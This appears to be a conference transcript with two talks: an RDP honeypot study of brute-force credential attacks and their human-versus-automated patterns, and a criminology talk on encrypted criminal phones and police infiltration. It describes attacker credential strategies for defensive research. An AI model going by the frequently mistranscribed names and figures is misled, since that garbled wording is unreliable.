a name and an address and it's like we're not police, right? It's not in our interest to do that. But we want to fight against their kind of anonymization just to be or to go as far as we can to try to identify what are their strategies and who are they. We want to scare them. So they have to change their strategies and find other ways and work harder to try to attack in order to increase their cost, right? In the attack, the calculation of benefits versus cost. So the agenda for today, I'll just explain very quickly what is the remote desktop protocol just to make sure we are on the same page. And then I'll show you, well, explain the only part that we used to collect the data. And I'll show you what the data we have analyzed for this presentation, for this research project. And I'll show you the indicators of human behavior versus machine-like behavior and how can this aggregated together can result into an engagement score, a human engagement score. So first, remote desktop protocol is a Microsoft protocol allowing users to access the graphical interface of remote computers. So with the shift to remote work after the pandemic, companies have relied on remote access tool to manage corporate devices and keep operation running. I'm sure there's a lot of you that use some type of remote protocol to access your work files. And well, there's less security-aware organization that even exposed their RDP directly on the internet. And the Cybersecurity and Infrastructure Security Agency reported an increase of 127% of the RDP endpoint exposed to the internet following the pandemic. So it's a lot of tool and since, oops, sorry for that. And since RDP give user complete control over the device, well, it has to be shown, it has been shown as a valuable entry point for threat actor and particularly for ransomware gang. So you understand the urgency of understanding attackers' behavior and proposing solution to improve protection or attack prevention. So to study credential attack on RDP, we operated, we operate, we're still operating, high interaction on the bots on the internet. So the objective of our Anepot is a research Anepot, so we're just collecting data and for research purposes. And our specific Anepot consists is an open source RDP interception tool called PyRDP. So, and it's in front of a real Windows server, so they can actually connect and do stuff on the Anepot. So PyRDP, you might have seen one of the presentation of Olivier Bilodeau who developed PyRDP with a couple of other interns. I don't see any of them here, but a lot of people work hard on the development of this tool and maybe you have seen or listened to Purple RDP, the presentation of Olivier about this one, about the tool. But basically, like this is the list of all it can do. However, I will not read all that. The thing is, like the important thing is that it's basically a monster in the middle which collects a lot of information. It saves basically everything. So we have access, it's also an RDP visualizer. So we have access to basically everything like that the person who connects to our server will type on his keyboard. We see where he clicks. It's really like a video of what he's doing once he connects. So it's highly interesting, but today I just, I will not talk about like the actual video footage. I will talk about the, before the confirmation, so the attack, the credential attack before a confirmation, right? So how do they compromise our RDP system? Let's start with that. And it's not with fancy backdoors and a lot of knowledge. It's very simple brute force attack which consists in just trying as much username and password as possible and try to enter, right? So with all that, we collected a lot of information, like a lot of attempt logins. And it was kind of too much to analyze. So I took a subset of three months for today. So it's from July 1 to September 30, all the attacks on those omnipot. And the information that is collected before the confirmation is timestamp IP addresses, the credential they try, so the username and the password. And I'm kind of excited to show you how far can we analyze the strategies with only those three information. So in this dataset that I'm presenting today, we have like over 3.4 million attempt login. And if we group them by IP, because you know one IP can attack us for like hundreds, thousands of times, hundreds of thousands of times, we end up with 1,529 different IP address in three months. So a bit of descriptive information about the dataset. So most attacks come from IPs that are registered in Asia and then Europe and then North America. We all know that it's not necessarily the origin of the attacker, since they can use compromised computer or proxies or anything, but still it gives us an idea of where they're from. And I classified Russia in Asia here. And this is an important information because Russia is the main attacker. So Russia, Panama and China. And China is Hong Kong mostly, because like for those who can see the red line, it represents the rest of China and the blue line is like Hong Kong. So it comes from Hong Kong, right? So yeah, now if we look at the most common username that are used in the attempt logins, like we understand that there's a lot, like there's 700,000 different username in our dataset, but here is the top 12, okay? So we see a lot of administrators, right? And on the Windows server, the default name is administrator. So it's kind of a good strategy to try this to connect. So if we look at this, all the variation of the word admin administrator and administrator, it represents 60% of the attempt logins. After that, if we look at the most common, no, it's still the most common username. Okay, so administrator a lot. And then we have those three weird ones in the top 12. Their presence in the top 12 is important, because this is information about our computer. It's our RDP name and our host name and certificate name plus something that is related to the fact that we are on the digital ocean. So those are information that they found. And then leverage them against us to try to enter our server. So there's many studies that's saying that brute force attack on RDP are kind of very basic and use, you know, leak lists available on the internet. And yeah, that are pretty much basic, but this is not what we see here because they use our information against us. And it's not like random usernames, it's our names. Okay, now, if we look at the most common password in the attempt login, we still have the top 12 here. Well, there's three important observation or trend here, is here, it's illustrated here. So first, the variation of our RDP certificate is the most common strategies that we see. And then variation of the word password, obviously, and then use of simple chain of number, like 10 or less number. So they are basically very bad passwords or targeted passwords. And so what we can conclude from that is that they basically assume that people have bad password, which is kind of true. So yeah, we have to keep saying to people that they have to change their password and have strong passwords. Our job is not done on that. So here's some observation related to the credentials, okay, that I wanted to highlight here. First, username, we can see a specialization of the username according to the country of the attack, of the origin of the attack. So here are two example of those specializations. So the first one, our RDP certificate name is used by China and Russia exclusively, right? So the attack that are targeted against our information come from China and Russia. This is their strategies. The username ADM is used exclusively by attacker from Nicaragua and Panama. I cannot explain that if you have an idea, you come and see me. And I just thought maybe it's more common in their area to use ADM as a default user. Another observation related to credential is that some, their strategy of some attacker is to use thousands of different passwords, but with the five same username, right? So 15% of attackers will have these strategies. With this strategy, sorry. So it might be a good strategy, but you have to be very confident about those five username that you use. Another observation is that some use the same username as they use for the password, the same word, right? So it's administrator, administrator. We see that a lot and it's in 21% of the time. Another observation, there are some that use the same set of credentials, so the same combination, right? More than one time. And this I cannot understand it because it didn't work the first time, what it would the second time, I don't know. So there's 26% of attackers who use a combination more than one time. This tells us that yeah, so maybe they are a group and they don't communicate very well with each other and they try the same list, which is not very efficient, or they are just like very mixed up and I don't know, they don't know what they're doing basically. So this represents like maybe more basics attacker than those who target us. So I'm done with the descriptive analysis. Let's dive into the research question. As I said, I perceive the attackers to be like a continuum of human engagement. So they are evidence pointing toward the use of automation, so machine-like behavior, and other indication or other evidence pointing toward human behavior. So by human, like of course there's a human at every step like in all those categories, but there's also a machine in all those categories. We understand that, but we just want to see like how different they can be. By human involvement, I mean that they are slightly, they have a slightly higher level of sophistication. This is what it means, okay. So I'll show you my maps. Okay, I love my maps. It looks complicated, but I'll explain. So this is an attack calendar, okay. This is July for July. So you have all the days in July and all the hours of the day, okay. So this is a time pattern attack for one IP. Each little bars represent attacks and like in this case, for this IP, the yellow one represents four attack at the time and this time frame, okay. So here we see a lot of attack. Here we see a very good example of an automated attack that is launched and obviously like there's no human pattern or human behavior here. It's purely computer behavior, right. Because it attacks very rapidly and at all times. So there's, you know, but this is like, I can find this in my dataset, but it's not the majority of what I see, okay. I see mostly those type of patterns. So it looks like, so to understand it, there's a start of the attack there and then it stops. Yes, I was looking at the time, it makes sense. It stops and then nothing happened. So I'm imagining that, you know, you start, you launch a list of credentials and then it stops and then it didn't, you didn't, you were not able to get in, right. And then you have to notice it and then you have to launch another block of attack with another list of credentials and this would look like this, right. But you might not be in front of your computer when it ends. So that's why there's time that appears to be pretty random in between the blocks of attacks. Because of course, and this is maybe like more of a human behavior than the other example, because of course we're not in front of the computer at all time and we have to sleep, right. But there's other example that are even more interesting. Well, for me, maybe you might not be as excited as I am, but here we see two things. We see first that they impose a delay between each attack, right. So this is a strategy that is more thought out because they are trying to imitate human behavior to avoid detection by imposing a delay between attacks. But the cool thing is, so we know that this is automated, right, because there's a delay included in the script and everything. But what is interesting is that there's days here, there's a hole in the calendar and this falls on the weekend of July. So we can imagine, like it has been documented that China employs people like office hour of people trying to hack other countries and this might be an example of this because they work full time during the week and then they close everything for the weekend, go home and come back on Monday. So this could be an example of this. It also can be someone who has a weekend job and do something else, we don't know yet, but it's hypothesis. And the final example that I wanted to show you, so he starts attacking our, the person starts attacking our on a putt on the 18, this is not important, but what I want to show you is the block of eight hour during which there's no attacks started. So attack can be running alone without a human in front of the computer, but there is this block of eight hour that we do not see any attack that is started. So you know, eight hour, this is what you need to sleep. So it might be during the night for this country. It might also be like eight hour shift of a day job too. So there's a lot of hypothesis here. So I was looking at this and I was like, okay, there's something human behind it, right? There's pauses, there's weekends, there's vacation days. So this is why I wanted to look at the extent to which the human is present behind the screen. So I identify indicators of machine like behavior and indicator of human like behavior. So we know that machine is everywhere in those indicator, but I would say maybe machine like behavior would be associated with a more basic attack, okay? So when we see a high number of attack, of course it's not a human that is trying by himself or herself, so I will associate it with a machine like behavior. When the passwords are present in the popular list of list credential and to know that I took the ROCQ 2021 with like eight billion passwords in it, if the password used by the attacker will mostly, like most of the passwords used was in this list, I consider that the passwords were like basic and part of a leak list that is available easily on the internet. So I consider this as a machine like behavior or like less sophisticated attack. Then the constant presence of the attacker over the observation period of three months, of course would be associated with machine like behavior. And finally, when there's several attack per second, it's an automation, of course, so I associated it with a machine like behavior. Now here we have the indicators of human like behavior or sophistication. So there's the start of attack blocks after long pause as I show with the calendar. This would be associated with the human. Those screens are very hot, by the way. I'm like burning. Attack is customized for its target as I show you the took our information, they leverage it against us. So I said, well, this is more of a tout-out than a basic attack, so I associated it with human like behavior. And finally, the delay between each logins. Of course, this is automated, but they are trying to imitate human behavior. So I classified it as a bit more sophisticated because they thought about it. So if I give a point, I made a plus one to each of those criteria when I see it. And then I remove a point for each of those criteria. We end up with an engagement score from human to machine on the continuum. So we see that there's more people on the human side or on the sophisticated side, always with quotation mark because we can talk a long time about sophistication and what it means and everything, but you understand where I'm coming from with all this presentation. So a bit more on the human side. So the conclusion of this is that we were expecting a lot of automation and basic automation and this is what other research has found before. So this is what we were expecting, but this is not exactly what we saw. We saw a lot of human patterns in the attack pattern calendar. We saw information leverage against us. So we saw attacks with characteristics that are more thought out than what we expected. So it's a bit worrying because if it was only basics, it would be encouraging, but still now we know. So we can defend against this. So the mitigation. First, our nepot is exposed to internet and you can, of course, use a VPN and not be exposed. So this is the first thing we should say, we should tell everybody, please hide behind a VPN that will, we will avoid a lot of problems this way. After that, you saw that the attack very fast all the time. On the new Windows 11, they installed the Lockout Policy Automatically and this is, I think, a good idea. Every time you try, if I'm not mistaken, like 10 passwords, they will block you for 10 minutes. This is very not efficient for an attacker who attack a lot, you know. Over the month, it will take them a lot more time to do so, to do as much attacks as they do. So this might be imposed on our system, maybe a bit more. This is a good idea for now. And also, we keep saying, I give talks about the passwords and everything and we keep repeating the same thing. The password hygiene is the best way to protect against those attacks because you saw, they use pretty much like simple passwords, variation of the word passwords and also they use our information. So we can consider this as personal information and we always say, like, don't use personal information in your passwords. So we have to keep saying that because it's true, it's still true, but also, keeping the default username is not a good idea and maybe we have to repeat it too because you need two information to get in, right? Why waste one? So username is as important as the password. So the next step, do I have one minute? Yes, okay. The next step of our research, we will look at the tool that customize attacks because we suspect that this is automated. They collect our information and they create their list, like automatically it might be. So we will be looking at this tool that they might use to customize their attack. After that, we want to investigate what lists of credential they use and it will be even better when we analyze the compromised session because we see all their tools and what they use. So we might be able to identify those credential they use since most are not data leaks. And then we want to investigate the shared and origin of proxies because for this presentation, I only took, like, I separated the IPs but some IPs are highly related. They might use more than one IP to attack us, so we want to do this aggregation. And finally, analyze the successful gain activities with the video footage. So more research should be performed to reveal precise tooling and strategies employed by opportunistic attackers. And we believe that exposing some of these group might have them think twice about attacking and about performing their opportunistic, sorry, brute-forcing RDP system on the internet. So we want to make their life hard, basically. That's all I got for today. So I'll be around if you have questions or thoughts or anything. Thank you. Thank you, thank you. Thank you so much, Andréanne. We'll have five minutes. If you have any questions, please scan the QR code so I can ask them after that. And the next presentation will be in French. Okay? In French. What's that? It's hot. Wow, you just have to plug that in. Okay. So we're going to start the last presentation of this series of presentations a little bit more in connection with criminology. Today, we have Professor David Descarriers-Dus who presents, who is a professor at the School of Criminology at the University of Montreal who is also the chair, the director of the Scher-Darknet and Anonymity Research Center at the University of Montreal. And with him, there's Mélanie Théoret who just presented. And I like that we give her a big applause because it's her first presentation at the University of Montreal conference. Thank you for being here. And thank you for presenting. Mélanie, she's a student who ends up in baccalaureate in criminology at the University of Montreal and she did a great research with David. And so she's presenting it today with you. So I'm going to leave you the stage. Thank you. Thank you, Massara. So I'm really happy to be with you this afternoon. Massara has just presented in a really elegant way. And I'm sorry for my voice, which is everything, except elegant. I didn't see you yesterday. It's coming back quietly. And I took a few moments where we usually present ourselves. We say to each other, we're beautiful, we're ugly, we're good. To invite you, in fact, I'm one of the co-organizers for B-16 Montreal. If you want to submit a talk on our CFP, it's open at the moment. So I'm going to take a little break to start. And I hope we'll all see you there. Now, for the moment, today, we're here to tell you what to do, to actually talk about cryptic telephones. We heard during the last few years the problem of going dark. How did police services ultimately have a lot of problems to investigate the criminals? And how did encryption actually change the balance of power if we want between the investigations, but also the criminals? And so today, in fact, what we wanted to be interested in was to say, OK, but does this problem really exist? How does it actually happen? So we have a presentation that is divided in two parts. In the first year, Melanie will go a little more, in fact, a review of everything we've seen on cryptic telephones that we're going to talk about now. What are these devices? We don't sell cryptic telephones, I have to say, from the start. But we'll see how interesting these phones are for criminals and how they're also a little more convenient. And so we're going to look at these phones a little bit. How are they available? We'll see that Canada plays a really central role in the distribution of these phones. And in the second part, I'm going to come back with my voice, I hope it will last until then. And we talked during the last few months to several lawyers, prosecutors, policemen, and we asked them, in fact, how do you manage this cryptic telephone problem? And we'll see that the point of view is really very, very, very different than whether it's a defense lawyer or a prosecutor or a police officer. And to see a little bit, for you, I think it will be interesting too, how can we protect our phones, how can we manage it, and what can the police do if the problem never arises and we were stopped. So that's the menu for today. And on that, I'll let Melanie start. Thank you, David. Before starting with the subject, a little context about electronic listening and encryption. In fact, we see that electronic listening, as you know, is surely a tool for police officers who can be very useful and who plays an important role in the investigations. Although it is still used quite rarely because of the costs and resources that it takes, when we use it, it actually brings an irrefutable proof. And with the development of listening capacities today, we can do electronic listening on text messages, internet connections, telephone lines, all that. So it's problematic for clients, in fact, because they will have to find other means to communicate with them because, naturally, they don't want to listen to the police officers. So the solution for them, you see me coming, it's going to be the encrypted phones that will allow them to anonymize their communications. So in fact, we would have two categories of encrypted phones. There are more regular phones, Android and PES, which we could say that these phones will be encrypted the phone's content by default, but we also have encrypted phones that we could say modified. So we really have suppliers who are going to create phones in this bubble, in the end, to encrypt the communications. So at the level of the PES and Android phones, as I said, there will be a fingerprint by default of the phone's content. So it's going to prevent the analysis of the content. However, it's not going to prevent access to the copy of the watch and the data and the calls that are transmitted when the phone will be seized. And we can also have messaging applications like signals, WhatsApp, telegram, even a Snapchat that can be used by some individuals in fact to encrypt the communications because the messages that are exchanged will be encrypted from one user to another. So it brings a plus protection for these individuals. However, we see that it's not something that is unfavorable because in the Salvatore-Montagnan case, in fact, we saw the GRC that was able to intercept messages encrypted on a Blackberry phone within users. So in fact, even though these applications say it's unfavorable and that we can't intercept messages, sometimes it doesn't work always. And on the side of modified calls, in fact, it's really phones that we're going to come to, for example, remove the GPS, the camera, the microphone, the Wi-Fi card, even the modem, all of that, to ensure the anonymity of the communications. So in fact, all the content of the phone will be encrypted automatically. And it's keynotes that are basically kept on the phone itself, which ensures a protection against electronic costs and the discovery of evidence on the phones. And the big feature of these phones is that all the content is unfavorable at a distance. So even if a criminal is going to intercept his phone, he will be able to erase the content. So even if the police force has access to the phone by technical means, it doesn't mean that the data will be there again. They can be erased. So in theory, the police services wouldn't be able to analyze encrypted phones. So it's really going beyond regular phones and commercial messaging applications like Signal and WhatsApp. A small global survey on the encrypted phones. In fact, we can see that Canada is in fourth position behind the United Kingdom, Germany and the United States, among the countries that produce the most encrypted phones. So it's really a problem that is present in Canada. We have providers that operate directly from Canada and also servers that are operated in Canada. So we really have a record in the encrypted phones. So these are some examples of providers that we have had over the years, which have succeeded. And as you can see, they have all been put out of service today. I'm going to talk a little bit more about what happened. In fact, Fentum Secure and Inetcom were simply Blackberry that had been modified. We have Skyglobal, which had been operated from Canada and the United States, which worked on iPhones, Goldpixel, Blackberry and Nokia. Then we had EncroChat, which worked as an Android operating system, by default. Then we did a little manipulation. We had the operating system of EncroChat that lit up and it was a encrypted operating system. And Anum, its partiality, it was actually, it was created in the case of a police investigation just to trap the criminals. So that's it. For the price and the subscription, naturally it's available as a cryptocurrency to support an anonymous user. Then the prices, it really varies from one supplier to another, but it still looks like, often we have a price for the device as such. So we see here for EncroChat 1,000 euros to process the device. Then we have a subscription per month which varies from one hundred dollars. This is for assistance. The assistance services are available 24 hours per 24 hours. And this assistance service, mainly, we talk about the distance distribution of the phone's content. So that's mainly the service that it offers. So basically, the phone is encrypted. It hasn't been customized for criminal reasons. However, it has become with time. We see that it has become a central element of organized crime. We find it in traffic of suspicion, money laundering, human traffic, terrorism. And we still have a lot of users. We see that SRE Global had reached 170,000 before its closure. And among these users, there are several that are actually criminals who use them for criminal reasons. So I'm going to talk a little bit about police operations that were done in relation to the phone's content. So for Inetcom, which is still open for three years, it was actually started by an investigation on the owner of Inetcom, Danny Manupassa. Then, following this investigation, there were inquiries about the company's servers because in fact, the key numbers were kept on these servers. So following the investigation, it was by the Dutch police. And the servers were based in Canada. And following this investigation, there was the arrest of the owner and other arrests that led to the closure. For Phantom Secure, it started in 2008. We saw Mexican drug traffickers with these phones. But it's really more in the 2014, 2015, 2016 that it became more known and we heard more about it. Then, after that, the FBI started an investigation in 2017 on the owner of the company, Vincent Ramos. And in fact, what the FBI did was that infiltrated agents had bought encrypted phones to Vincent Ramos. And during the purchase, during the discussion, Ramos would have said that, in fact, Phantom Secure was specifically created to facilitate drug trafficking. So once they announced it, the error that it made was that the FBI stopped them and put an end to the company. For N-Cruchart, in fact, we saw a growing presence of these phones in organized criminal groups, which led to the beginning of an investigation in 2017. And then, following this investigation, the method that was used was, in that case, the police forces tried to export a security file by pirating the phones. In fact, the method that they used was not revealed exactly what they did, but the spot is that they would have installed a file on the servers responsible for updates or they would have installed a file on the phones, which makes them infiltrate the network and then access to encrypted communications. And then, after that, it ended up in the N-Cruchart service. So in fact, N-Cruchart, when they realized that the security forces had infiltrated them, they sent messages on everyone's phones and said, I'll throw away your phones, it's no longer good, it's done to be. For Skyglobo, once again, following the growing popularity of a start-up investigation in 2018 by the Belgian police, in cooperation with other countries, France and Belgium, then the method used in that case was that the police forces bought Skyglobo's phones and installed damson applications on the phones and sold them in the past for regular Skyglobo's phones and people who bought them, thinking that it was real phones. And like that, the police forces were able to listen to the communications and access the messages on encrypted. For Anum, as I said earlier, it was still created by a police investigation and it was an alternative to the other founders who had just been closed in 2021, just before. And in fact, it's the FBI that was responsible for that. They wrote an informant in the field and it gave them contact to sell their phones. So there are people who bought them without knowing that all the messages were actually sent to the police servers. And that led to the arrest of more than 800 people per session, 16. So the operation worked. And these are other companies that we have in activity today. We can see that we have a little bit in different countries. In Canada, we have Armadillo Phone and Wireless Warehouse which still exists. Their sites are accessible. We can buy encrypted phones. On the other hand, is it related to criminal activities? We don't know, probably, but they are still in service today. And well, challenges in police investigations, it's sure that the use of encrypted phones brings certain challenges for the forces of the law, especially its delay, it increases the cost of investigations because it can be very long to be able to access the phones, it requires technical skills that not all the forces of the law have. So it's sure that its delay in the investigations can prevent the arrest or the arrest of evidence. Or even that the investigation has been carried out in the end. It happens that the police can just not access the phones, so they will just abandon the accusations because it's their only proof, for example. And then, at the level, it's a traditional and modern method. Traditionally, what we did to access the phones, we went through these errors until we were able to get in. However, it can be very long, it means taking millions of attempts. And if today that the phones that we have, they will be locked up after a dozen attempts. So it's not really impossible to do that today. So today's methods are actually to exploit a security fault in the phone that is unknown to the manufacturer. However, it is necessary to have the skills to do it, which is not always the case. And then, at the level of the choice to decipher a device, normally we have two choices. Well, I would say three. The third is that the suspect lets us access his phone, but naturally he will not let us. But the two choices would be to give to the manufacturer to decipher the device, for example, by having a mandate or by asking him, but if the manufacturers will want to prioritize the confidentiality of their users and give them all that. Otherwise, the other, it would really be to control the deciphering with the help of technical means, as I explained a little bit by exploiting the security faults and all that. And then, at the level of the court, it also brings certain issues to the court and all that. We see, for example, that in the UK, it is considered as a serious factor when we use a phone to hide its criminal activities, it is considered as a serious factor. Which, the same thing with Canada, we see that in the decisions, the range that we see and that we draw, the use of a PGP phone has been considered as a serious factor, because it was used to hide criminal activities. And then, the big difference between the cryptic phones and regular phones is that the cryptic phones are not just to access a crime, as regular phones like the US or Apple can do, but they were created to hide criminal activities deliberately, so that's the big difference at the level of the court. So, I'm going to let David talk about the rest of our research. Excellent, thank you. So, a little bit of what Melanie explained, is at what point the service offer was really important, but also what makes it interesting to see that about all the cryptic phone services that were launched over the last 15 years have been infiltrated by the police, have been closed, and in the end, we haven't given all the secrets that the criminals would have liked to have. And there are also a lot of legal contests, in fact, in the case of Encrochat, for example, the French police have still put in place, all the encrochat users, without knowing who they were, in which country they were, whether they were criminals or not, and there are a lot of questions to be asked, well, since the police can listen to anyone, no matter how, so there are still a lot of questions that are made about that. And our goal was, therefore, to try to better understand this phenomenon, by talking to the people who are in the justice system, who will investigate the criminals, who will be able to manage all of this. And that's why, in fact, we talked about, in the last few months, the police, the lawyers of the defense, who are probably the most fun people with whom to talk to, I encourage you to do so. Find yourself a lawyer if you haven't already, go to the gym. And lawyers. And the judges, it comes from, in fact, we are in negotiation, always a little more delicate for the judges. But in fact, the question that we all asked them, very simply, is it possible to get phone calls, crypts and encryption, it changes something for you? A really simple question, but then we hear them talk for hours. And basically, when we talk to them, it's interesting to see, in fact, but this problem, in fact, it's called Kaki. And then, right away, we could think that, well, that would be hyper-high-level delinquents. And it's really interesting to see that already, the delinquents of organized crime are high-level. In fact, they just don't have a point phone. Why? Because a lawyer, you can't be followed, your GPS, we can put you under hearing. And so, in fact, the problem, we can completely eliminate it by not having a phone, even if I don't know what kind of life we have if we don't have a phone, but good. But so, what spoke a lot, in fact, it was all organized crime, when we talk about encryption, organized crime, in fact, of a medium level, because when we talk about street gangs and others, they are not necessarily enough lit to use this kind of technology. And even I had a presentation this week where I was listening and finally, well, street gangs put all this on YouTube, finally, everything they do. So it's like the reverse of encryption, I don't know what it would be, finally, the term. But hey, they are like completely decrypted. But otherwise, they talk a lot about frauders, of course. Even I don't know if you receive that regularly. I constantly receive offers to invest in cryptocurrencies. So people try to use messages that will be encrypted, a lot for fraud. And of course, without a big surprise, well, the pedophile who doesn't like that we know they have pictures of young children and that we monitor their communication. Here, in fact, it speaks a little, we can say OK, but the people who do piratage, the people who are involved in this kind of community, well, since practically no one is accused, it goes a little under the radar, so we speak a little about it. One of the really interesting points is what we can do with AI and the images today, that's what that means. But more pertinently, in fact, what point does everyone have to whom we talked about our goal was really to find, like one delinquent somewhere, who used this modified phone, the encrypted phones, and speaking to everyone, finally, it's like a problem that doesn't exist. And that was still quite interesting to see that Canada produces a lot of this phone. The companies that sell this phone are active in Canada, but speaking with people, in fact, it's not necessarily a problem where people don't go to that level. And we can understand it too. I don't know if this is someone who still uses a BlackBerry, but when we look at his neighbor, who has a Pixel 7 or an iPhone, if I tell you, look, let's take my BlackBerry, you'll see, you'll see with people, it's not something that's super interesting. And so the problem that they were observing was a lot with all the encryption, what we do with the phones, but it's probably all Android and iOS, a little bit of a base that people used. And here, there are still some constructs that are really interesting. One, we can always question, in fact, we know that the police like to sell themselves, to say to what extent they are capable of doing everything. When we talk to them, and when we finally talk to even the prosecutors, what they're going to tell us is that today, there is no encryption that resists the tools they have. And if you think that your iOS will protect you, you'll finally count a police fraud. You have to forget that. And the big question, in fact, is how much time will it take? Will it take months to get there? Probably. But depending on who you are, they might be going to put the resources to get there. So, in all the cases that we were telling us, it's that we are able to break quite any encryption, but the flexibility, on the other hand, is not always guaranteed, it's that if you are the police body, I don't know, my Rosemary, and there is a Cambrillelage, you will find a phone, the chances that your phone will be encrypted are pretty bad, but if you have a murder in Montreal, if you have something of national security, we realize that, finally, we will have more powerful, more accessible tools, but there is still a huge lack of accessibility for the tools, and also, perhaps, for the criminals to protect themselves, and so on, you will never find the information that is on my phone. And so, here, there is no need to have, obviously, the older the phones are, the easier it is. It's still a package of numbers, saying that you are not helping if you are stopping, but it's no need to be a necessarily important tool for the security forces. And the last thing, and this is the thing that we often forget, is that we focus on the phone, but the phone will make backups every day, every minute, in fact, in the cloud, whether it's WhatsApp, whether it's iOS, and in addition, the other companies are starting to encrypt backups, but it's far from being generalized, and often, what the services will do is turn the encryption into a complete one, and just go to the backups in the cloud to look for the data and finally save months of work. And here, it even applies to things like Snapchat, which is still quite interesting and quite questionable to see. We think that all these faces are of service, but not necessarily as much as we would think. Here, one of the things that was really interesting, and we could have made a little survey, I would have had a little more time, but one of the questions, in fact, is to say to yourself, OK, but when the police will seize a phone, when we talk to the lawyers of the defense, the police look like that, and they say, wow, once we take the phone, we are able to go to any place, take anything, and if we take any of your phones, we have access to your bank accounts, your couriers, your messengers, we have access to an incredible amount of information. And here, it's really interesting to see the point of view of the defense, which will tell us, well, once we take the phone, the others are gone, they will go and look for anything, they will find additional crimes, and in fact, it's not bad to end the game, if you enter the phone, we are not quite dead. On the other hand, when we were talking to the prosecutors and the police, it was a completely different discourse, where they said to us, when I go in a phone, I have to be able to say exactly what application I want, what information I'm looking for, for what period. So you really have to limit this extremely, extremely pointed out. And in fact, it's not them who will do it, so we have a technical service, and what they said is that even when we send the mandate, well, the people of the technical service will make filters, but it may be wrong between the 5-1 and the 6-1, because of course, it's all the same. And so you don't even know if it's all the messages that you're supposed to have in the phones. And here, other problems are really quite important, it's that when we're going to ask for a mandate, for example, we're going to say, well, we're going to have all the communications between Massara, Andréane and David, but obviously in our phones, what you think is the name of Massara, Andréane and David, which is clearly not well written, which means that when you're in the phone, there's no message that comes from Andréane, so you have to try to pivot, you have to try to find the legality. What's Andréane's other name? Or his hacker nickname, we'll talk about it later, in the Q&A maybe, but you have to try to find how you can connect people to their virtual identity because the mandates are going to be extremely limited. And here, it's reassuring or disturbing depending on which side of the law you are, but even he was telling us that when we're going to send someone in a phone, we're going to send around the date of the crime so it's not true that you can say, there's a murder last week, I would like to see the messages two months ago, the judges will tell you no, you have to watch the days before the murder, the days after the murder, and that's it. So it's really interesting to see at what point are the challenges to collect and pivot in the phones, it's really a real crisis at the moment and one last thing about the challenges, it's the fact that surprisingly, the most difficult thing to access, what was it? Well, it was the photos and videos that people take, which is probably the thing we want the most, to have, and apparently, the expectation of private life is so strong that in the end, the judges will never give it to us. Now, as I was telling you, still, are the phones playing an important role? You have the answer in front of you. It was really interesting to see at what point, is that today, a large, large party, in fact, the proof will come from the smart phones, and that's why the police will put so much energy to break the encryption to have access. He gave me an example, in fact, a murder that happened last year in Montreal, he was doing the file on a subject, and the subject that he was saying in the file, well, it was shot by someone. So it was still good because it was still there. They were able to follow the shooter until his car, where they were saved, and finally, when they were in the car, they were able to stop the two people who were involved in the murder. Then, by taking the phones, there were all the messages on who was in charge of the murder, how much was paid, all the details, there were even photos, in fact, of the plagues of the person who showed that he had had the surveillance of the target in front of him. It was perfect, and in the end, you don't even need anything else. You bring the phone in front, you let it show, and it was absolutely everything you needed. So today, it's really interesting to see how much all the evidence and all the energy is put on the smart phones, and it also asks the question of how do we manage this problem, but also, do we invest elsewhere, and how much are we not all of us in the same panel, and it's not problematic. And here, obviously, the last thing, it was to say, well, we know that this is an incredibly important role, but at the same time, it will make that if we don't cooperate, it will bring problems, but in fact, it's true in many cases, yes, so the sophisticated, the fact of having a smart phone not to collaborate, not to give its code, we were losing months in the system of justice, we brought really important costs, and all of that, it made that we could have penalties that would be higher, simply because we used encryption, and that too, I think it's still enough, which is great to know if we can be punished simply because we use encryption technologies, I don't know if we want to live in that world. And so, to finish, well, of course, we asked people how can we improve all of that? In fact, that's where there are all kinds of solutions that come in, and of course, when we talk about the police side, well, we should actually be able to unlock all the phones if we had a smart phone, and that would be interesting to say in our Q&A just now, at what point do we want to be able to protect these data in England at the moment, so there's a lot of debate on exactly the access to encrypted data, I think that the government would like to have access to everything, and we will come up with solutions, for example, we will make an organization that will manage our encryption keys, which will give access to certain information, but is it still quite questionable to see if we really want to allow this access to everyone? And the other thing is that there is really a feeling, and that's still quite interesting to see at what point, is that the police, are they not going to cheat a little? Mainz-Sylmanda says, you have the right to look at the photos. Are the police really going to not look at the photos? Are they going to stop the flow in the phones? At the moment, the police are with the phone, and we have no idea, except their good faith, that they did not abuse the system, and there we have a lot of stories that we hear about precisely how we find the proof in the phones, and then we are going to find a reason to legitimately have this information. And that's still really questionable, and it's the same thing for the computers too. So, at what point are we able to protect our data? And at what point can we not put in place finally measures to prevent that there is surveillance, or that it depends on the world? And finally, the last thing, we do not understand too much, is the fact that several judges we will see to tell them, we want a mandate to monitor a phone, they do not necessarily understand what is happening, what are the implications, and the fact that there is still a big disconnect that often allows the police, finally, to go a little further, where they should go. So, that's all for us, I hope it was interesting, and that it raises important questions for Q&A. If you have any questions, you can write to us or talk to us in a few moments. Thank you. Scan the Q&A, write it, and then we'll see you in 15 minutes for a little Q&A session together. It's time to take a little coffee, a little beer, and see you right away. Celebration, let's go. Oh, we have less people for the questions. Yeah, they're beautiful, aren't they? Oops. Okay, thank you for coming back. Let's start this Q&A session, and don't forget the Q&R, which I said earlier. I cut QR, if ever you wanna ask questions or abode questions too. So yeah, I guess before asking the audience's questions, I had prepared a few questions for our speakers, so I'll start with that just to kick off. And we'll start with Vicky, because you were the first one to present. Thank you very much for the time and for the presentation. Thank you for having me. So, I know you have a background in criminology, and you know that in our field, we often talk about different theories, and we know that often when we have opportunities, delinquents will often try to reach these opportunities, and then after that, we'll kind of see a lot of them being exploited and will plateau. So this was applied, this kind of theory was applied to cyber crime, where we saw that different types of cyber crime were highly exploited for a really long time, and then slowly, less and less people exploited it just because the marginal revenue was less. Do you think that for ransomware, we're kind of reaching this plateau, or are we still in the higher ups of the curve, if you see what I mean? So, all right, I've never had a mic before, so let me know if you can hear me. Yeah, great. So I think the answer is not that simple, because as things progress and we have new software coming out, there's always new opportunities that are born. Well, not born, but are created. So until software are being sold with zero vulnerabilities to them, and like, defense is in the creation of those projects, those software, I don't think we're gonna be in a position to say that the opportunities for ransomware are lacking. And I also think that opportunities are sought after and they're gonna find one when they are looking for them. I also think that they're still money to be made, so if monies is still at play, they're still gonna find a way. So that would be my answer. I used to think that ransomware was sold 2018, to be honest, and then just, just, RAS has happened and it just never stops, and I'm just wondering when we'll reach that plateau where ransomware will be out and we'll have like another kind of threat that we'll all be talking about, but it just doesn't seem to happen, so I totally agree with you, maybe not. Maybe I can ask Andreanne another question. One thing that I would wanna say is, if you know Andreanne, you know she works with Olivier at Gosecure and they're doing amazing research, and maybe now you'll know, because I'll 